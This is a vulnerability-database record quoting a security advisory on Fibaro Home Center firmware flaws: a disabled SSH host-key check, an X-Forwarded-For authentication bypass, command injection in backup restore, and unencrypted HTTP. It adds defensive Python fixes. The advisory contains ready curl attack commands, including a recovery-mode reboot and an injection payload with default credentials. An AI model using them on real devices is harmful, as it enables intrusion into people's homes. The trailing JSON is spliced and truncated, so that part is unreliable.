    VAR-202104-0467

    Vulnerability from variot - Updated: 2024-11-23 22:05

    Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using a DNS spoofing attack, and the device-initiated remote port-forward channel can then be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions.

    IoT Inspector Research Lab Advisory IOT-20210408-0
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                 title: Multiple vulnerabilities
        vendor/product: Fibaro Home Center Lite / Fibaro Home Center 2
                        https://www.fibaro.com/
    vulnerable version: 4.600 and older
         fixed version: 4.610
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991,
                        CVE-2021-20992
                impact: 8.1 (high)     CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
                        9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
                        7.2 (high)     CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
                        8.1 (high)     CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
              reported: 2020-11-18
           publication: 2021-04-08
                    by: Marton Illes, IoT Inspector Research Lab
                        https://www.iot-inspector.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Vendor description:
    -------------------

    "FIBARO is a global brand based on the Internet of Things technology. It
    provides solutions for building and home automation. FIBARO's headquarters
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    employs app.

    1) Disabled SSH host key check (CVE-2021-20989)

    IoT Inspector identified a disabled SSH host key check in the scripts that
    open the device's connections to the Fibaro cloud, which enables
    man-in-the-middle attacks on those connections. An attacker who diverts a
    device-initiated connection to a host under their control can eavesdrop on
    communication between the user and the device. As communication inside the
    SSH port-forward is not encrypted (see #4 on the management interface), user
    sessions, tokens and passwords can be hijacked.
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    (CVE-2021-20990)

    An internal management service listens on port 8000, and some of its API
    endpoints can be reached without authentication to trigger a shutdown, a
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can
    upload firmware without authentication, potentially an older version that
    still contains the known remote command execution vulnerability (see #3).
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    (CVE-2021-20991)

    An authenticated user can run commands as root through a command injection
    vulnerability in the backup restore endpoint.
    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky
    ICS CERT: https://securelist.com/fibaro-smart-home/91416/
    
    
    
    4) Unencrypted management interface (CVE-2021-20992)

    Home Center devices provide a web-based management interface over
    unencrypted HTTP. Communication between the user and the device can be
    eavesdropped to hijack sessions, tokens, and passwords. The management
    interface is only available over HTTP on the local network. The vendor
    recommends using the cloud-based management interface, which is accessible
    over HTTPS; requests are then forwarded to the device through an SSH
    connection between the Fibaro cloud and the device (the connection whose
    disabled host-key check is described above).
    
    
    
    1) Disabled SSH host key check

    The init script that establishes the remote-access tunnel fetches the cloud
    endpoint and port over HTTPS and then starts the dropbear SSH client with a
    remote port-forward back to the device's web interface:

    <snip>
    case "$1" in
      start)

                    .....

        # get IP
        local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

        # get PORT
        local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

                    ....

        start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"
    </snip>
    
    
    
    The device uses the dropbear SSH client to initiate the connection; option
    -y disables the host-key check ("Always accept hostkeys if they are
    unknown"), voiding much of the transport-layer security SSH would otherwise
    add. (dropbear accepts unknown host keys with a single -y and, with -y -y,
    changed ones as well.)

    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.:
    lb-1.eu.ra.fibaro.com

    An attacker who can redirect that name, by DNS spoofing or any other means
    of diverting traffic, can intercept the connection: since any host key is
    accepted, the attacker's server completes the SSH handshake, and the device
    then sets up the remote port-forward to its own web management interface
    (localhost:80) on the attacker's host.
    
    
    
    A similar problem exists for remote support connections:

    ./opt/fibaro/scripts/remote-support.lua
    <snip>
    function handleResponse(response)
      responseJson = json.decode(response.data)
      print(json.encode(responseJson))

      local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip .. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
      os.execute(autoSSHCommand)
    end

    function getSupportData()
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey
      print(remoteUrl)

      http = net.HTTPClient({timeout = 5000})

      http:request(remoteUrl, {
        options = {
          method = 'GET'
        },
        success = function(response)
          handleResponse(response)
        end,
        error = function(error)
          print(error)
        end
      })
    end

    getSupportData()
    </snip>
    
    
    
    Here, the remote support endpoint returns the following data:
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY.ZZZ"}

    The same dropbear ssh client is used with option -y, and the fields of the
    JSON response are concatenated unvalidated into a command string handed to
    os.execute(). In this case, the device's own SSH server on port 22 is made
    accessible through the port-forward. However, that server only allows
    public key authentication with a hard-coded SSH key. No further testing
    has been done on compromising the support SSH connection.
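Added example, not part of the advisory and not Fibaro's code: a hardened version of the tunnel set-up that both the init script and remote-support.lua above perform, written in Python so it can be exercised offline (the other examples on this page use Python as well). It replaces the blacklist `tr -d` filtering of the cloud responses with allow-list validation, builds the command as an argv list instead of a shell string, and pins the cloud host key rather than accepting any key (-y). The pinned known_hosts path, the allowed domain suffix `.ra.fibaro.com` (both sample responses in the advisory end in it) and the OpenSSH option names are assumptions; the device ships dropbear, where the equivalent policy is to drop -y and pre-provision the cloud host key in the client's known_hosts file.

```python
import re

# Assumed paths and policy; the advisory names none of these.
PINNED_KNOWN_HOSTS = "/etc/fibaro/cloud_known_hosts"      # pre-provisioned cloud host key(s)
CLIENT_IDENTITY = "/etc/dropbear/dropbear_rsa_host_key"   # identity the device already uses
ALLOWED_SUFFIX = ".ra.fibaro.com"                         # assumption: all endpoints live here

_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})+$")


def validate_host(raw: str) -> str:
    """Allow-list the 'get IP' / 'ip' response: a syntactically valid hostname
    under the expected domain. Anything else is rejected outright instead of
    merely having a few metacharacters stripped, as `tr -d` does."""
    host = raw.strip().lower()
    if _HOSTNAME_RE.match(host) and host.endswith(ALLOWED_SUFFIX):
        return host
    raise ValueError(f"unexpected cloud endpoint: {raw!r}")


def validate_port(raw: str) -> int:
    """The 'get PORT' / 'port' response must be a bare TCP port number."""
    if not re.fullmatch(r"[0-9]{1,5}", raw.strip()):
        raise ValueError(f"port is not numeric: {raw!r}")
    port = int(raw)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def endpoint_accepted(ip_response: str, port_response: str) -> bool:
    """True when both cloud responses pass the allow-list checks."""
    try:
        validate_host(ip_response)
        validate_port(port_response)
    except ValueError:
        return False
    return True


def build_tunnel_argv(ip_response: str, port_response: str, local_port: int = 80) -> list:
    """Build the reverse-tunnel command as an argv list (no shell parses it),
    with the cloud host key pinned instead of accepted blindly (dropbear -y).
    OpenSSH option names are used here; see the lead-in for dropbear."""
    host = validate_host(ip_response)
    port = validate_port(port_response)
    return [
        "ssh",
        "-o", "StrictHostKeyChecking=yes",                  # unknown or changed key: abort
        "-o", f"UserKnownHostsFile={PINNED_KNOWN_HOSTS}",   # pinned file replaces ~/.ssh/known_hosts
        "-o", "BatchMode=yes",                              # never prompt on a headless device
        "-o", "ServerAliveInterval=30",                     # same intent as dropbear -K 30
        "-i", CLIENT_IDENTITY,
        "-N",                                               # forward only, no remote shell
        "-R", f"{port}:localhost:{local_port}",
        f"remote2@{host}",
    ]
```

Only the argument vector is built here; a caller would hand it to subprocess.run() or start-stop-daemon. With the key pinned, a key rotation on the cloud side becomes a deployment step instead of a silent change, which is exactly the property that makes interception of the tunnel detectable.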
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    
    
    The device runs an nginx server, which forwards requests for PHP files to a
    lighttpd server on port 8000 for further processing:
    <snip>
                                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            location ~* \.php$ {
                proxy_pass   http://127.0.0.1:8000;
            }

            location ~* \.php\?.* {
                proxy_pass   http://127.0.0.1:8000;
            }
    </snip>

    The lighttpd server is not only reachable on the loopback interface, but
    also from the local network.
    
    
    
    Authentication and authorization are implemented in PHP, and there is a
    special check for connections originating from the host itself. However,
    when determining the remote IP address, the X-Forwarded-For header is taken
    in preference to the actual peer address:

    ./var/www/authorize.php
    <snip>
    function isLocalRequest()
    {
        $ipAddress = "";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
        else
            $ipAddress = $_SERVER['REMOTE_ADDR'];

        $whitelist = array( '127.0.0.1', '::1' );
        if(in_array($ipAddress, $whitelist))
            return true;

        return false;
    }
    </snip>
    
    
    
    As the lighttpd service is reachable from the network, an attacker can send
    the request straight to port 8000 and supply the required X-Forwarded-For
    header themselves. (Requests that pass through nginx are not affected in
    the same way: $proxy_add_x_forwarded_for appends the real client address to
    any header the client sent, so the exact-match comparison against
    127.0.0.1 fails.)

    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    <snip>
    <?php
        require_once("../../authorize.php");

        if (!isLocalRequest() && !isAuthorized())
        {
           sendUnauthorized();
        }
        else
        {
            exec("systemShutdown");
        }
    ?>
    </snip>

    ./var/www/services/system/reboot.php
    <snip>

    function authorize()
    {
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER));
    }

    function handlePOST($text)
    {
        if (!isLocalRequest() && !authorize())
        {
           sendUnauthorized();
           return;
        }

        $params = tryDecodeJson($text);
        if(!is_null($params) && isset($params->recovery) && $params->recovery === true)
            exec("rebootToRecovery");
        else
            exec("systemReboot");
    }

    $requestBody = file_get_contents('php://input');
    $requestMethod = $_SERVER['REQUEST_METHOD'];

    if ($requestMethod == "POST")
        handlePOST($requestBody);
    else
        setStatusMethodNotAllowed();

    </snip>
    
    
    
    An attacker can issue the following HTTP request, directly to the lighttpd
    port and therefore bypassing nginx, to reboot the device into recovery mode:

    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php

    In recovery mode, firmware images can be updated without authentication.
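Added example, not code from the device: the origin check from authorize.php ported to Python next to a corrected version, run over four constructed CGI environments that model the paths a request can take on the device (straight to lighttpd on 8000 with a spoofed header, through nginx with the same header, through nginx from a local process, and straight to 8000 from a local process). The 192.168.1.50 client address is made up.

```python
LOOPBACK = {"127.0.0.1", "::1"}
# Only the nginx instance on the same host may assert a client address.
TRUSTED_PROXIES = {"127.0.0.1", "::1"}


def is_local_request_vulnerable(env: dict) -> bool:
    """Port of the advisory's isLocalRequest(): X-Forwarded-For, if present,
    replaces the real peer address no matter who sent the header."""
    ip = env.get("HTTP_X_FORWARDED_FOR") or env["REMOTE_ADDR"]
    return ip in LOOPBACK


def client_ip(env: dict) -> str:
    """Trust X-Forwarded-For only when the TCP peer is the local nginx, and then
    use the last address: $proxy_add_x_forwarded_for appends the real peer
    after anything the client supplied, so the last entry is nginx's own."""
    remote = env["REMOTE_ADDR"]
    xff = env.get("HTTP_X_FORWARDED_FOR", "")
    if remote in TRUSTED_PROXIES and xff:
        return xff.split(",")[-1].strip()
    return remote


def is_local_request_fixed(env: dict) -> bool:
    return client_ip(env) in LOOPBACK


# Constructed CGI environments, one per path a request can take on the device.
SAMPLE_REQUESTS = {
    # the advisory's curl: straight to lighttpd, attacker-supplied header
    "direct_to_8000_spoofed": {
        "REMOTE_ADDR": "192.168.1.50",
        "HTTP_X_FORWARDED_FOR": "127.0.0.1",
    },
    # same header, but sent to port 80: nginx appends the real peer
    "via_nginx_spoofed": {
        "REMOTE_ADDR": "127.0.0.1",
        "HTTP_X_FORWARDED_FOR": "127.0.0.1, 192.168.1.50",
    },
    # a process on the device talking to port 80
    "via_nginx_from_host": {
        "REMOTE_ADDR": "127.0.0.1",
        "HTTP_X_FORWARDED_FOR": "127.0.0.1",
    },
    # a process on the device talking to lighttpd directly
    "direct_from_host": {"REMOTE_ADDR": "127.0.0.1"},
}


def decisions(check) -> dict:
    """Run one of the two checks over every sample request."""
    return {name: check(env) for name, env in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name in SAMPLE_REQUESTS:
        print(f"{name:24s} vulnerable={decisions(is_local_request_vulnerable)[name]!s:5} "
              f"fixed={decisions(is_local_request_fixed)[name]}")
```

The corrected check removes the header-spoof bypass on the direct path, but two caveats follow from the advisory itself: lighttpd should additionally be bound to 127.0.0.1 so that the direct path does not exist at all, and because the remote-access tunnel from section 1 also terminates on localhost:80, requests relayed from the cloud are loopback-origin from the device's point of view. An origin check is therefore no substitute for the authentication that shutdown.php and reboot.php skip whenever it succeeds.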
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations can be triggered through HTTP endpoints:

    ./var/www/services/system/backups.php
    <snip>
    function restoreBackup($params)
    {
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
        {
            setStatusTooManyRequests();
            return;
        }

        $type = $params->type;
        $id = $params->id;
        $version = $params->version;

        if (is_null($id) || !is_numeric($id) || $id < 1 )
        {
            setStatusBadRequest();
            return;
        }

        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");

        if ($type == "local" && $hcVersion == "HC2" || $type == "remote")
        {
            $version ?
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) :
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id);
        }
        else
        {
            setStatusBadRequest();
            return;
        }

        setStatusAccepted();
    }
    </snip>
    
    
    
    The parameter $version is neither validated nor escaped before it is
    concatenated into the exec() call, so an authenticated user can inject shell
    commands: the ';' ends the intended command and whatever follows runs as a
    separate command with the web server's privileges, which on this device
    means root:

    cat > /tmp/exploit <<- EOM
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}}
    EOM

    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php

    (The Basic credential in the example decodes to admin:admin; any valid
    management credential works, as the endpoint only requires authentication.)
    
    
    
    
    Version 4.550 and later escape the parameter with escapeshellarg(), which
    wraps the value in single quotes so that the shell treats it as a single
    literal argument:
    <snip>
        $version = escapeshellarg($params->version);
    </snip>
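Added example, not the vendor's code: the three ways of building the restore command line, in Python rather than PHP, with shlex.quote() standing in for escapeshellarg() (both wrap the value in single quotes). shell_commands() tokenises a command line the way /bin/sh does and splits it at command separators, which makes the difference visible without executing anything: the unescaped build yields two commands, the escaped one a single command whose last argument is the literal payload. The allow-listed variant assumes a version string of the form 4.540 (hypothetical; the advisory does not define the format) and returns an argv list so that no shell is involved at all. The sample version values are constructed from the advisory's exploit body.

```python
import re
import shlex

# Hypothetical version format; an allow-list makes the escaping question moot.
VERSION_RE = re.compile(r"[0-9]+(?:\.[0-9]+)*")

MALICIOUS_VERSION = "1; INJECTED COMMAND"   # taken from the advisory's /tmp/exploit
BENIGN_VERSION = "4.540"


def build_vulnerable(type_: str, id_: int, version: str) -> str:
    """Pre-4.550 behaviour: raw concatenation into the string passed to exec()."""
    return f"screen -dmS RESTORE restoreBackup.sh --{type_} {id_} {version}"


def build_escaped(type_: str, id_: int, version: str) -> str:
    """4.550 behaviour: escapeshellarg() ~ shlex.quote() on the tainted value."""
    return f"screen -dmS RESTORE restoreBackup.sh --{type_} {id_} {shlex.quote(version)}"


def build_allowlisted(type_: str, id_: int, version: str) -> list:
    """Stricter option: validate every field and return an argv list, so no
    shell ever parses request data (exec() of a string always involves one)."""
    if type_ not in ("local", "remote"):
        raise ValueError("type must be local or remote")
    if not isinstance(id_, int) or id_ < 1:
        raise ValueError("id must be a positive integer")
    if not VERSION_RE.fullmatch(version):
        raise ValueError(f"version rejected: {version!r}")
    return ["screen", "-dmS", "RESTORE", "restoreBackup.sh", f"--{type_}", str(id_), version]


def shell_commands(cmdline: str) -> list:
    """Tokenise like /bin/sh and split on command separators, returning one
    argv per command the shell would run. punctuation_chars=True makes shlex
    emit ';', '|', '&&' and friends as their own tokens, but only outside quotes."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&", "|", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
    for label, builder in (("unescaped", build_vulnerable), ("escaped", build_escaped)):
        cmd = builder("remote", 1, MALICIOUS_VERSION)
        print(f"{label:9s} {cmd!r}")
        for argv in shell_commands(cmd):
            print("          would run:", argv)
```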
    
    
    
    
    
    4) Unencrypted management interface
    
    
    
    Nmap shows a few open ports on the box:

    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8000/tcp open  http-alt

    Both 80/tcp and 8000/tcp serve the management interface over unencrypted
    HTTP; there is no HTTPS listener on the device.
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:
    -----------------------------

    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version
    at the time of the discovery.
    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540 and 4.530.

    Solution:
    ---------

    Upgrade to version 4.610 or later, which fixes vulnerabilities 1, 2 and 3.

    Vulnerability 4 is not fixed, as the vendor assumes that the local network is
    trusted and the device only provides wired network access. Furthermore, the
    vendor recommends using the cloud-based management interface, which is
    accessible over HTTPS; requests are forwarded via an SSH connection between
    the Fibaro cloud and the device (the connection whose missing host-key check
    is vulnerability 1, fixed in 4.610).

    Advisory URL:
    -------------

    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:
    ------------------------

    2020-11-18: Contacting Fibaro through support@fibaro.com,
                support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn
    2020-11-24: Advisory sent to Fibaro by email
    2020-12-01: Fibaro confirmed the receipt of the advisory
    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes
    2021-03-16: Fibaro beta release (4.601) with the fixes
    2021-03-24: Fibaro applies for CVE numbers
    2021-03-31: Fibaro GA release (4.610) with the fix
    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector.

    IoT Inspector is a platform for automated security analysis and compliance
    checks of IoT firmware. Our mission is to secure the Internet of Things. In
    order to discover vulnerabilities and vulnerability patterns within IoT devices
    and to further enhance automated identification that allows for scalable
    detection within IoT Inspector, we conduct extensive security research in the
    area of IoT.

    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT
    firmware, we aim to responsibly disclose relevant information to the vendor
    of the affected IoT device as well as the general public in a way that
    minimizes potential harm and encourages further security analyses of IoT
    systems.

    You can find our responsible disclosure policy here:
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0467",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20989",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2021-20989",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2021-20989",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20989",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20989",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1328",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20989",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
    "data": "Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions. IoT Inspector Research Lab Advisory IOT-20210408-0"
\n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. 
\n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
